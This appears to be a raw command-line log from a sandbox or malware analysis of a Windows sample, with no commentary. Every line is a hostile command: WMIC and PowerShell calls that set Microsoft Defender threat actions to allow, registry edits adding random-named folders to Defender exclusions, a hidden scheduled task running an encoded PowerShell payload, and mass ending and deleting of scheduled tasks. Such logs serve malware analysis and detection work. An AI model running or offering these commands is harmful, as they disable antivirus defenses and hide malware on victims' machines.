- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
- '%WINDIR%\syswow64\cmd.exe' powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
- '%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Acti...
- '<SYSTEM32>\taskeng.exe' {4E871B43-97F0-4C04-9735-EE55E3CB06C8} S-1-5-21-1960123792-2022915161-3775307078-1001:cerumv\user:Interactive:[1]
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "giOBFNDjM"
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
- '%WINDIR%\syswow64\cmd.exe' powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
- '%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_A...
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "giOBFNDjM" /SC once /ST 14:15:28 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZ...
- '%WINDIR%\syswow64\wbem\wmic.exe' /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
- '%WINDIR%\syswow64\cmd.exe' powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
- '%WINDIR%\syswow64\forfiles.exe' /p <SYSTEM32> /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Act...
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "giOBFNDjM"
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\QPraEWTdXgUvhuIt" /t REG_DWORD /d 0 /reg:32
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\QPraEWTdXgUvhuIt" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\YyEFfdkdfSCAyCYpA" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\VCFsCINNSKfU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\becFSQNUaGCELWVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\becFSQNUaGCELWVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\zbZJqMsxbdgnC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\zbZJqMsxbdgnC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oxmCqSrXHHDWQupPXwR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oxmCqSrXHHDWQupPXwR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aQYEPcSYU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aQYEPcSYU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\VCFsCINNSKfU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\QPraEWTdXgUvhuIt" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TjuNclevzQUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TjuNclevzQUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C copy nul "%WINDIR%\Temp\QPraEWTdXgUvhuIt\lYyGZLwM\tvDgZjrsXserLZhx.wsf"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\QPraEWTdXgUvhuIt" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\QPraEWTdXgUvhuIt" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\QPraEWTdXgUvhuIt" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\QPraEWTdXgUvhuIt" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\QPraEWTdXgUvhuIt" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "krPFpIHzfGkIf"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pZGLURqEkyviFO"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "AKJHOTxqHrqCbNnJZ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ubKfwasvGpgDbFCEq"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "brsILvvctPxZWBokPdF"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "bvLtWQzBDKcDHBdTKLw2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "bvLtWQzBDKcDHBdTKLw2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "bvLtWQzBDKcDHBdTKLw"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "bvLtWQzBDKcDHBdTKLw"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "UWkFvWzfevBHVghwmWb2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "UWkFvWzfevBHVghwmWb2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "UWkFvWzfevBHVghwmWb"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qBSCiQtmSIWAdvJYjhR"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "UWkFvWzfevBHVghwmWb"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "WGNMKNyfFCizPMAeCyc2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WGNMKNyfFCizPMAeCyc"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "WGNMKNyfFCizPMAeCyc"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qNqvNuCKaYjiFAxubHA2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qNqvNuCKaYjiFAxubHA2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qNqvNuCKaYjiFAxubHA"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qNqvNuCKaYjiFAxubHA"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "brsILvvctPxZWBokPdF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WGNMKNyfFCizPMAeCyc2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "brsILvvctPxZWBokPdF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qBSCiQtmSIWAdvJYjhR2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qBSCiQtmSIWAdvJYjhR2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ucxlVuIooGBQWNuNE"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "RtSooSmXXfhDvPTfVOG"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cGVXoziRITlvnxvlmAr2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cGVXoziRITlvnxvlmAr2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cGVXoziRITlvnxvlmAr"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cGVXoziRITlvnxvlmAr"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "agaHotyGOTOgjjMejoo2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "agaHotyGOTOgjjMejoo2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pqqaeutprNirznxAhHZ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "agaHotyGOTOgjjMejoo"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "agaHotyGOTOgjjMejoo"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pqqaeutprNirznxAhHZ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pqqaeutprNirznxAhHZ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pqqaeutprNirznxAhHZ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "RzMYNDJZVIhtZGuoSOG2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "RzMYNDJZVIhtZGuoSOG2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "RzMYNDJZVIhtZGuoSOG"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "RzMYNDJZVIhtZGuoSOG"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qBSCiQtmSIWAdvJYjhR"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "brsILvvctPxZWBokPdF"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KAqacPTDjbEpfHfQhGr2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KAqacPTDjbEpfHfQhGr2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ubKfwasvGpgDbFCEq"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "CFnsJCjITLgalBDoj"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "lGZexusyKTzLhcJIb2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "lGZexusyKTzLhcJIb2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "lGZexusyKTzLhcJIb"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "lGZexusyKTzLhcJIb"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ubKfwasvGpgDbFCEq2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ubKfwasvGpgDbFCEq2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CFnsJCjITLgalBDoj"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "CFnsJCjITLgalBDoj2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CFnsJCjITLgalBDoj2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zmjxHavqoBnHDdKkg2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zmjxHavqoBnHDdKkg"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zmjxHavqoBnHDdKkg"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "vXJyvDKxQnPKYxFly2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "vXJyvDKxQnPKYxFly2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "vXJyvDKxQnPKYxFly"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "vXJyvDKxQnPKYxFly"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zmjxHavqoBnHDdKkg2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "MgNpIWMgMeDFIfNVU"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KAqacPTDjbEpfHfQhGr"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "MgNpIWMgMeDFIfNVU2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KAqacPTDjbEpfHfQhGr"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "GoKjiFzPyuLLhgQGZ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KksigChOmFHsxAMFeGF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KksigChOmFHsxAMFeGF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KksigChOmFHsxAMFeGF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KksigChOmFHsxAMFeGF"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "TMwGiLwabefYGPDLF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "TMwGiLwabefYGPDLF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "TMwGiLwabefYGPDLF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "TMwGiLwabefYGPDLF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "GoKjiFzPyuLLhgQGZ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "MgNpIWMgMeDFIfNVU"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "GoKjiFzPyuLLhgQGZ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "GoKjiFzPyuLLhgQGZ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EUyulEIDNTZmrnyBQ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "EUyulEIDNTZmrnyBQ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EUyulEIDNTZmrnyBQ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "EUyulEIDNTZmrnyBQ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "MgNpIWMgMeDFIfNVU2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "AKJHOTxqHrqCbNnJZ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "krPFpIHzfGkIf2"